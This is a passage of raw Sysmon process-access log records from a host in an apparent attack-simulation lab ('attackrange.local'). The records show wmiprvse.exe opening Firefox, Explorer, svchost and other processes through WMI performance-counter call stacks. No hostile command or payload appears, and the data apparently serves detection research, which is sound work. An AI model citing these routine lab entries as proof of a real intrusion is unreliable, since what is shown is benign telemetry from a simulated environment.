Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151045Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151044Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151043Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151042Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151041Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151040Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151039Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151038Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151037Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151036Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151035Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151034Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151033Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151032Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151031Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151030Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 